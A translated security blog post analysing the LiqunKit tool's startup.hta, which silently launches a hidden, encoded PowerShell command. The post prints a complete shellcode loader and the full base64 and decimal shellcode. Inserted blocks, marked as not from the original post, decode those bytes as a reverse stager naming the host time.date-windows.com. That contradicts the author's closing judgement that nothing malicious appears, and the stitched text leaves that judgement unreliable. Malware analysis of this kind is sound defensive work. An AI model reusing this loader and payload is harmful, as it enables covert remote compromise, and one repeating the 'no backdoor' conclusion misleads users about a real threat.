
PowerShell decoding and analysis test (LiqunKit?) – vulsee.com

2021-11-30 20:51

How it started

Somehow the group chat suddenly filled up with screenshots of LiqunKit being flagged as infected, and then people started going on about backdoors, abnormal traffic and the like..

As it happens I had seen this tool on T00ls (土司) only a moment earlier,

Project page: https://github.com/Liqunkit/LiqunKit_

———————————————————————————————–

A backdoor doesn't seem very plausible.. and the screenshots in the group were all of scan results from uploading the files to ThreatBook (微步) and VT

Those are next to useless; it sounds like people blurting out whatever comes to mind. The developer ships exploitation modules for redis and so on, and haven't hacking tools like that always been flagged by AV?

Here is the directory listing:

Of the modules the author ships, apart from the redis one everything is plain text.. and yet a bunch of people say the tool has a backdoor, pointing at, for example

startup.hta

Opening it shows:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand 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");</SCRIPT>

and someone went off on:

 -nop -w hidden -encodedcommand 

So I thought, damn it, why not just decode the thing and find out? Besides, if you claim someone's tool is backdoored, what good does muttering about ThreatBook/VT results do? Then again, what if it really does have a backdoor?

Getting started

Original:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand 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");</SCRIPT>

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

Base64 decode (the -encodedcommand argument is the script as UTF-16LE text, base64-encoded):

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

Base64-decode the inner string as well:

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

The result looks like garbage; reading further on:

New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress)

So it is gzip-compressed; decompress it with a script and write out the sample file:

import base64
import gzip

code2 = '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'   # the inner FromBase64String("...") blob
code2ed = base64.b64decode(code2)   # raw gzip bytes: only the outer -encodedcommand layer is UTF-16LE text, this layer is binary
with open("decoded.gzip", 'wb') as f:
    f.write(code2ed)
with open("decoded", 'wb') as f:    # the decompressed loader script
    f.write(gzip.decompress(code2ed))
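An added end-to-end version of the three unwrapping steps above (base64 → UTF-16LE text → inner base64 → gzip), as example code that is not part of the original post. Because the real strings are elided on this page, the block builds a payload with the same layering around a constructed, harmless stage-3 script and then unwraps it; the function names, the two regexes and the sample strings are choices made here.

```python
import base64
import gzip
import re

# Added example, not from the original post. The layers seen on this page:
#   1. powershell -nop -w hidden -encodedcommand <base64 of the script as UTF-16LE text>
#   2. $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("<base64 of gzip>"));
#      IEX (...GzipStream($s, Decompress)...).ReadToEnd();
#   3. the gunzipped loader script (Set-StrictMode ... $DoIt ...)

ENCODED_CMD_RE = re.compile(r"-encodedcommand\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
INNER_B64_RE = re.compile(r"""FromBase64String\(["']([A-Za-z0-9+/=]+)["']\)""")


def extract_encoded_command(hta_text: str) -> str:
    """Layer 1: pull the -encodedcommand argument out of the HTA/JScript one-liner."""
    m = ENCODED_CMD_RE.search(hta_text)
    if m is None:
        raise ValueError("no -encodedcommand argument found")
    return m.group(1)


def decode_encoded_command(b64: str) -> str:
    """-encodedcommand carries the script as UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")


def unwrap_gzip_stager(stage1: str) -> str:
    """Layer 2: the FromBase64String("...") blob is a gzip stream; gunzip it to get stage 3."""
    m = INNER_B64_RE.search(stage1)
    if m is None:
        raise ValueError("no FromBase64String(...) blob found in stage 1")
    return gzip.decompress(base64.b64decode(m.group(1))).decode("utf-8")


def unwrap_all(hta_text: str) -> str:
    return unwrap_gzip_stager(decode_encoded_command(extract_encoded_command(hta_text)))


# Constructed sample: the page elides the real strings, so wrap a harmless stage-3
# script in the same three layers and unwrap that.
def build_sample_hta(stage3: str) -> str:
    gz_b64 = base64.b64encode(gzip.compress(stage3.encode("utf-8"))).decode("ascii")
    stage1 = (
        '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
        "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" % gz_b64
    )
    enc = base64.b64encode(stage1.encode("utf-16-le")).decode("ascii")
    return ('<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell")'
            '.run("powershell -nop -w hidden -encodedcommand %s");</SCRIPT>' % enc)


SAMPLE_STAGE3 = "Set-StrictMode -Version 2\nWrite-Host 'constructed stage 3'\n"
SAMPLE_HTA = build_sample_hta(SAMPLE_STAGE3)

if __name__ == "__main__":
    print(unwrap_all(SAMPLE_HTA))
```

To use it on the real file, pass the contents of startup.hta to unwrap_all; the UTF-16LE step is the one the original script got wrong, since it applied a text decode to the inner gzip blob instead of the outer -encodedcommand layer.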

Decompress that gzip:

which yields the file decoded:

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('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')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

Another string shows up:

38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb

It can be run in PowerShell:

[Byte[]]$var_code = [System.Convert]::FromBase64String('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')

Convert the decimal byte values to hex/binary:

import binascii

# Byte values as printed by [Convert]::FromBase64String(...) in PowerShell, i.e. the array
# before the loader's "-bxor 35" loop runs over it.
content = ("223 203 170 35 35 35 67 170 198 18 241 71 168 113 19 168 113 47 168 113 55 168 81 11 44 148 105 5 18 220 18 227 143 31 66 95 33 15 3 226 236 46 34 228 193 211 113 116 168 113 51 168 97 31 34 243 168 99 91 166 227 87 105 34 243 115 168 107 59 168 123 3 34 240 192 31 106 168 23 168 34 245 18 220 18 227 143 226 236 46 34 228 27 195 86 215 32 94 219 24 94 7 86 193 123 168 123 7 34 240 69 168 47 104 168 123 63 34 240 168 39 168 34 243 170 103 7 7 120 120 66 122 121 114 220 195 123 124 121 168 49 200 165 126 75 77 70 87 35 75 84 74 77 74 119 75 111 84 5 36 220 246 203 35 35 35 35 18 220 116 116 116 116 116 75 25 117 90 132 220 246 202 135 35 35 35 120 18 234 114 114 73 32 114 114 75 152 34 35 35 112 115 75 116 170 188 229 220 246 115 202 175 35 35 35 120 18 241 113 75 35 17 227 167 113 113 113 112 113 115 75 200 118 13 24 220 246 170 229 160 224 115 75 163 16 35 35 170 195 73 39 115 73 60 117 75 86 101 189 165 220 246 124 18 220 116 116 73 220 112 117 75 14 37 59 88 220 246 166 227 44 167 233 34 35 35 18 220 166 213 87 39 170 218 200 42 75 137 230 193 126 220 246 170 226 75 102 2 125 18 220 246 18 220 116 73 36 114 117 115 75 148 116 195 40 220 246 156 35 12 35 35 26 228 86 36 123 115 202 88 220 220 220 18 220 202 178 34 35 35 202 234 34 35 35 203 76 220 220 220 12 74 121 64 21 35 199 223 226 51 244 95 65 59 42 218 194 37 111 32 44 82 199 115 42 117 206 41 248 116 139 96 24 153 45 128 143 93 175 44 119 246 201 47 127 224 15 6 47 100 243 52 12 52 19 225 40 7 254 39 57 201 40 16 156 254 204 137 72 108 67 135 79 228 145 110 205 219 55 35 118 80 70 81 14 98 68 70 77 87 25 3 110 74 64 81 76 80 76 69 87 3 109 119 115 3 85 3 18 13 19 46 41 35 174 23 169 129 147 27 23 229 9 13 28 16 92 186 162 226 158 223 239 203 110 200 5 235 201 155 56 63 105 131 161 88 97 129 187 52 175 45 61 96 46 89 68 75 247 126 163 55 208 122 243 101 225 89 241 225 67 209 172 232 207 158 164 75 109 55 110 244 169 130 171 0 149 222 167 213 29 121 227 237 108 104 238 51 37 43 178 56 12 20 223 19 "
           "82 86 186 44 5 173 110 213 40 141 89 228 231 176 229 15 101 28 132 156 53 141 69 139 247 87 139 132 34 117 216 57 253 169 94 158 169 205 147 20 61 79 115 53 94 54 94 233 181 86 91 97 43 150 95 193 90 75 21 174 251 19 159 0 192 68 164 92 97 95 48 142 36 94 197 86 35 7 34 43 79 2 6 161 13 96 22 231 5 171 137 217 19 80 75 145 76 50 108 169 2 199 57 214 94 140 92 178 123 148 185 194 90 240 82 247 63 196 51 39 155 131 18 227 93 112 7 43 113 70 237 109 37 81 10 99 171 66 134 5 179 21 150 18 228 135 3 255 225 131 113 89 10 51 188 181 85 232 222 45 40 197 140 161 63 152 48 223 178 228 241 92 130 236 181 50 32 35 75 211 150 129 117 220 246 73 99 75 35 51 35 35 75 35 35 99 35 116 75 123 135 112 198 220 246 176 154 35 35 35 35 34 250 114 112 170 196 116 75 35 3 35 35 112 117 75 49 181 170 193 220 246 166 227 87 229 168 36 34 224 166 227 86 198 123 224 203 170 222 220 220 87 74 78 70 13 71 66 87 70 14 84 74 77 71 76 84 80 13 64 76 78 35 49 23 117 91")

raw = bytes(int(n, 10) for n in content.split())   # same bytes as $var_code right after FromBase64String
hex_str = binascii.b2a_hex(raw).decode()             # the hex form the first version of this script built by hand
print(hex_str)

# The loader XORs every byte with 35 before VirtualAlloc/Copy/Invoke, so the bytes that actually
# execute are raw ^ 35. Write those out; this is the file to hand to scdbg.
content = bytes(b ^ 35 for b in raw)
with open("ps_shellcode", 'wb') as pe_file:
    pe_file.write(content)

Generate the shellcode:

Then I analysed it with the malware-analysis tool scdbg.exe; I can't really read the output, but going through the motions, there don't seem to be any malicious traces:
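Before handing the file to scdbg, a check worth doing that the post above skips (added example, not the author's code): the loader's for loop XORs $var_code with 35 before copying it into the VirtualAlloc'd RWX buffer, so the decimal dump above holds the encoded bytes, and an emulator fed the raw dump has nothing meaningful to run. The block applies that XOR, compares the first bytes against the usual x86 reverse-stager prologue (cld / call rel32 / pushad / mov ebp,esp = FC E8 89 00 00 00 60 89 E5) and carves printable strings. DUMP_EXCERPT holds three slices copied from the dump above (its first 9 values, the 36 values starting "55 35 118 80", and its last 26 values), with the middle omitted; paste the full two-line array in its place to process the whole buffer. The function and constant names are choices made here.

```python
import re

XOR_KEY = 35  # the "-bxor 35" in the loader's for loop

# Constructed excerpt: three slices copied from the decimal dump above (first 9 values,
# the 36 values beginning "55 35 118 80", last 26 values); the middle is omitted.
# Replace with the full array to process the whole buffer.
DUMP_EXCERPT = (
    "223 203 170 35 35 35 67 170 198 "
    "55 35 118 80 70 81 14 98 68 70 77 87 25 3 110 74 64 81 76 80 76 69 87 3 "
    "109 119 115 3 85 3 18 13 19 46 41 35 "
    "87 74 78 70 13 71 66 87 70 14 84 74 77 71 76 84 80 13 64 76 78 35 49 23 117 91"
)

# cld ; call rel32 0x89 ; pushad ; mov ebp,esp -- the prologue shared by the common
# x86 Metasploit / Cobalt Strike reverse stagers
STAGER_PROLOGUE = bytes.fromhex("fce88900000060" "89e5")


def parse_dump(text: str) -> bytes:
    """Whitespace-separated decimal values -> bytes, exactly like the PowerShell array."""
    return bytes(int(n) for n in text.split())


def xor_decode(raw: bytes, key: int = XOR_KEY) -> bytes:
    """Undo the single-byte XOR the loader applies before VirtualAlloc/Copy/Invoke."""
    return bytes(b ^ key for b in raw)


def looks_like_x86_stager(sc: bytes) -> bool:
    return sc.startswith(STAGER_PROLOGUE)


def carve_strings(sc: bytes, min_len: int = 6) -> list:
    """Printable-ASCII runs; HTTP stagers keep the host name and headers in the clear."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, sc)]


def analyse(dump_text: str) -> dict:
    sc = xor_decode(parse_dump(dump_text))
    return {
        "size": len(sc),
        "x86_stager_prologue": looks_like_x86_stager(sc),
        "strings": carve_strings(sc),
    }


if __name__ == "__main__":
    print(analyse(DUMP_EXCERPT))
    # The XOR-decoded bytes are what scdbg should be pointed at, not the raw dump.
    with open("ps_shellcode.bin", "wb") as f:
        f.write(xor_decode(parse_dump(DUMP_EXCERPT)))
```

On those excerpts the XOR yields exactly the prologue bytes above plus the strings "User-Agent: Microsoft NTP v 1.0" and "time.date-windows.com", which is the kind of artefact (an HTTP header and a host name) to look for in scdbg's output once it is given the decoded buffer.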

For a laugh:
Source: https://vulsee.com/archives/vulsee_2021/1130_15727.html